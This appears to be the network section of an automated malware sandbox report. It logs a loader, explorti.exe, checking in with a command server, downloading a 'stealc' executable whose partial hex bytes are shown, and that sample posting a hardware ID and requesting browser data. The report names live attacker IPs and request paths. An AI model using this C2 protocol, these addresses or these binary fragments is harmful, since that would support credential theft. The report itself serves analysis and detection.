                                                                Jul 5, 2024 04:25:33.526262999 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526271105 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526288986 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526290894 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526305914 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526318073 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526320934 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526324987 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526340008 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526348114 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526356936 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526366949 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526374102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526384115 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526401997 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526401997 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526418924 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.526432037 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.526664019 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.527825117 CEST804991377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:33.527954102 CEST804991477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:33.527956009 CEST4991380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:33.528125048 CEST4991480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:33.528218985 CEST4991480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:33.533364058 CEST804991477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:33.535783052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.535799980 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.535829067 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.535842896 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.535850048 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.535860062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.535875082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.535887957 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.535892010 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.535901070 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.535904884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.535934925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.535934925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.536022902 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.536443949 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.536461115 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.536478043 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.536506891 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.536513090 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.536537886 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.536550045 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.536556005 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.536571980 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.536593914 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.536607027 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.536756992 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537228107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537245035 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537261009 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537280083 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537296057 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537309885 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537322998 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537341118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537353039 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537353039 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537357092 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537368059 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537374020 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537385941 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537389994 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537403107 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537405014 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537431002 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537435055 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537451982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537461996 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537467003 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537475109 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537483931 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537498951 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537513018 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537513971 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537516117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537520885 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537534952 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537545919 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537549973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537558079 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537565947 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537578106 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537583113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537595034 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.537609100 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537763119 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.537763119 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594091892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594110012 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594141960 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594158888 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594167948 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594176054 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594185114 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594209909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594209909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594227076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594238997 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594254017 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594367981 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594393969 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594408035 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594434023 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594449043 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594463110 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594463110 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594465017 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594471931 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594486952 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594492912 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594505072 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.594515085 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594530106 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.594942093 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.605345964 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605379105 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605406046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605421066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605436087 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.605437994 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605454922 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605467081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.605472088 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605489969 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605504036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605510950 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605520010 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605537891 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605586052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605602026 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605623960 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.605623960 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.605623960 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.605654001 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:33.605663061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605676889 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605693102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605709076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:33.605724096 CEST804990385.28.47.30192.168.2.4
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.44973077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:03.699208021 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:04.401321888 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:04.402679920 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:04.625840902 CEST283INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 35 64 0d 0a 20 3c 63 3e 31 30 30 30 30 30 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 62 30 64 35 64 61 32 63 38 35 30 36 37 33 62 35 64 37 36 61 63 31 63 65 38 63 63 64 34 61 36 65 37 66 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 5d <c>1000006001+++b5937c1a99d5f9db0d5da2c850673b5d76ac1ce8ccd4a6e7f1fbd97e9c4543b31de15441#<d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.44973177.91.77.81807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:04.633394003 CEST54OUTGET /stealc/random.exe HTTP/1.1
                                                                Host: 77.91.77.81
                                                                Jul 5, 2024 04:23:05.339127064 CEST1236INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:05 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 2544640
                                                                Last-Modified: Thu, 04 Jul 2024 23:59:33 GMT
                                                                Connection: keep-alive
                                                                ETag: "66873765-26d400"
                                                                Accept-Ranges: bytes
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c8 e6 86 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 94 1a c0 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 c0 00 00 04 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$JdZaaa5ZaaRichPELf!@0@ @@@0!@@Pp# @y#(@.data""4@
                                                                Jul 5, 2024 04:23:05.339153051 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e b5 9f 37 30 52 1a 13 be 67 bd 65 b5 5a 71 ee 38 c1 e5 dd 51 e8 9e 39 ee
                                                                Data Ascii: 70RgeZq8Q9(zB@957O.X#*D`o:%8EF@T|7xhj?oAj4W;yY|f4rn|(U0art_Ncp=0x
                                                                Jul 5, 2024 04:23:05.339169979 CEST1236INData Raw: c8 12 76 ea e0 5f c2 5f 18 48 29 83 ac fb 73 21 da 3e 16 86 e2 bf 61 61 bb 6e 0a cf c5 df 91 91 bd 04 f6 0a 3b a9 87 eb 32 ad 54 87 8a 90 12 ec f3 65 6e c0 1e 2a ef 16 cd 7b 5a d1 0e 92 7e b5 56 45 5e 19 0e 88 3b f3 9e 45 9e 55 b7 08 11 38 8d 96
                                                                Data Ascii: v__H)s!>aan;2Ten*{Z~VE^;EU8VUAW@#Ak7~3`M7pgo@!6rFR-TI n8ew(y_-2kq_[\#'AII"Bn>~BAv)p0Lryy+W
                                                                Jul 5, 2024 04:23:05.339185953 CEST1236INData Raw: fb 37 df 58 3e 45 a4 43 1c 2f 05 3a 53 d9 8a df c4 38 ec 6a 6e 03 5d c8 72 07 4a 7c 43 b7 01 1a 2d 4e 42 67 21 1f a0 f3 bd 30 11 ca a2 35 8c 6c 3b 1f c6 ad 3a 1c 53 d3 81 c5 fd 97 12 4e e1 f8 db d8 16 17 71 12 6b bb d3 ba 7f a5 ae 85 f4 4f 0f f3
                                                                Data Ascii: 7X>EC/:S8jn]rJ|C-NBg!05l;:SNqkOO[6_|rQRbi[F1]0*GO&g%5c@Nc|\PWVUlh"3c).fpP>V6J(M.i\K]}K2O34!N
                                                                Jul 5, 2024 04:23:05.339201927 CEST896INData Raw: ff ac 68 37 a0 40 09 1c 70 8b fe bb ce c4 38 dd c6 b5 53 bb 89 6a f0 55 13 d4 65 af bc 29 4c c9 9b 21 33 e4 86 f9 d1 74 40 5b 40 ca 95 8e 13 ab d7 0d e5 fb 9f 09 f1 3d de 60 25 24 87 82 7d 22 87 d4 1a f7 cc 3a 5f c0 58 24 1b fe 2c a5 8e 82 e6 a6
                                                                Data Ascii: h7@p8SjUe)L!3t@[@=`%$}":_X$,EbRa5RuN^_ZUq<D.)#;ec.5xV;yNd7LC=McoX`VRS\nO1gcodg}6%vYh@Wkyacuxqk5k/o
                                                                Jul 5, 2024 04:23:05.339220047 CEST1236INData Raw: b6 72 81 38 85 6f 5b 74 33 f8 cc 44 49 ce 4c 88 24 3d 98 05 64 54 64 39 bd 91 a2 5b ed 32 7d a1 09 36 66 50 83 ac 43 8d ea 58 22 7c 0a 7d 6f 20 74 6a 09 eb 3a 78 18 89 81 66 14 10 91 0b 59 ee e4 a5 5c e1 c0 bf 2d 52 bc 3f 9c fc 80 76 15 b2 85 3c
                                                                Data Ascii: r8o[t3DIL$=dTd9[2}6fPCX"|}o tj:xfY\-R?v<,:!-5\b9z:yU3Q_8MCnT>``fiysOnY:i{|c)ODR;Nv:0+)9]4N1REfaX+f
                                                                Jul 5, 2024 04:23:05.339236021 CEST1236INData Raw: fb 40 15 5d be 63 f6 cd bb 00 23 d0 ad 3f ed 37 f1 3f c7 37 72 53 f5 25 d1 c7 74 ae 9b 28 0a 3c 36 82 f9 2d 00 9d bf f7 81 d9 45 c2 af 24 78 84 3d 17 f3 dc 4a 3a 53 7a 2f 7e bf af 7c 70 93 e7 07 dd 87 30 61 dc 7e ce e7 f5 72 50 08 45 40 9e 9e b7
                                                                Data Ascii: @]c#?7?7rS%t(<6-E$x=J:Sz/~|p0a~rPE@Z1rsRx;ilMOgg_Wx-J4q7SPe+:6uW3mFon*U[mhNkTCcXRw;,q^CqX7.zD4, '\Z>QVXBgO
                                                                Jul 5, 2024 04:23:05.339263916 CEST1236INData Raw: 93 6d de 7f f4 6d 28 92 1a 2f ab 50 44 4e 6f f2 6a e6 57 74 cb c7 8a 19 7f c1 8e 58 8a a4 ba 7d 9a b1 b4 fa 79 98 98 7d 3c bd a6 cb b4 53 ac 80 28 fc 32 1a 96 39 fe 23 30 fc 8b 1e 30 3e 82 08 92 60 d5 b0 69 38 dd b1 88 70 4b 0c ec d4 fa 6b 8f 7f
                                                                Data Ascii: mm(/PDNojWtX}y}<S(29#00>`i8pKk=Ne5-$y}{xgAwj\c9CL*3Cl92L)ALpw)Oa16gxv"[D,ngnc}'XfN[:Nh00ZF+i}p'bC%~//W0#%
                                                                Jul 5, 2024 04:23:05.339327097 CEST1236INData Raw: bf b3 26 3c 0a 1e 8b 45 f0 43 d1 29 52 f0 ae be 39 23 95 d2 f1 a9 b6 c7 01 66 68 18 62 cc bd dd 32 79 82 6e d1 a8 2d 46 f5 f7 7a dd 47 75 6c be d1 4d ce 16 04 43 f9 87 3c f0 c1 9b e8 af 05 fe f8 53 bd 46 52 c3 02 f7 e8 1c 2d 1d fa 4c 38 bd 9b 74
                                                                Data Ascii: &<EC)R9#fhb2yn-FzGulMC<SFR-L8t"PJSH+4\F%"cZ4'<>w_Y|?HykT.]p3{depR,57q|pMF1w0iD!5kaVgXU-G^p
                                                                Jul 5, 2024 04:23:05.339344978 CEST1236INData Raw: 30 46 56 1a bf 68 3d 9a 55 62 0c d9 fc f9 9e 18 de 23 7a 04 22 27 75 7e 59 7b 77 eb 73 38 5b 0b ba 6c 8a 2b cf fb e3 da 6e f9 5a 9b 32 7f 85 14 ea 63 a8 9f 91 b7 ec 7f dd 7c dd a9 ca 2a 92 cc dd a8 27 7a 3d 77 33 06 95 39 c1 45 25 04 9c 41 d7 fa
                                                                Data Ascii: 0FVh=Ub#z"'u~Y{ws8[l+nZ2c|*'z=w39E%AT"Epe/]U+k\;idWwgw2'2xf%zw/r}$/@v:A} nl@/tzE>N;1m]
                                                                Jul 5, 2024 04:23:05.344120979 CEST1236INData Raw: 2a 4f 73 06 ab 4f 13 72 fe cb 53 4f 35 e1 f0 f6 0f 90 6a 32 8a 1e 3b d4 b3 be 18 ca f9 e0 cf e1 be 07 d6 85 b9 6f 41 f7 22 39 58 f3 70 1d 59 34 c4 b2 ed af d6 a7 e1 98 cb ee 40 4e f5 4c 47 90 fd 07 cc 6f ad 6d 99 83 16 53 c8 aa 3b 33 9b 43 10 64
                                                                Data Ascii: *OsOrSO5j2;oA"9XpY4@NLGomS;3Cd=[f9dk`=.q4^RDa&*^7?{-VLJDav}|)Z?/H3"dL;%_+O/IMxP\E8U-(ht0ZFA


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.44973285.28.47.30808076C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:08.037694931 CEST409OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHC
                                                                Host: 85.28.47.30
                                                                Content-Length: 211
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 46 45 35 36 43 42 38 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 2d 2d 0d 0a
                                                                Data Ascii: ------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="hwid"9EFE56CB86684217651120------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="build"Nice------AECAKJJECAEGCBGDHDHC--
                                                                Jul 5, 2024 04:23:08.952868938 CEST384INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:08 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 156
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 5a 6a 67 78 4f 57 4e 6a 5a 44 56 6c 4e 44 4a 6b 4f 47 55 7a 4e 7a 4d 31 4f 54 4e 6a 4d 32 55 30 4d 57 49 78 5a 44 67 34 4e 6a 64 6a 59 54 56 6a 4e 54 42 68 4d 32 51 77 4d 57 5a 6d 4f 54 68 6b 4e 7a 51 7a 5a 6a 63 30 59 6a 64 6b 5a 54 4e 6c 4d 57 59 35 59 57 49 78 4d 32 51 31 4d 6d 4e 6c 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                Data Ascii: ZjgxOWNjZDVlNDJkOGUzNzM1OTNjM2U0MWIxZDg4NjdjYTVjNTBhM2QwMWZmOThkNzQzZjc0YjdkZTNlMWY5YWIxM2Q1MmNlfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=
                                                                Jul 5, 2024 04:23:08.954286098 CEST466OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF
                                                                Host: 85.28.47.30
                                                                Content-Length: 268
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a
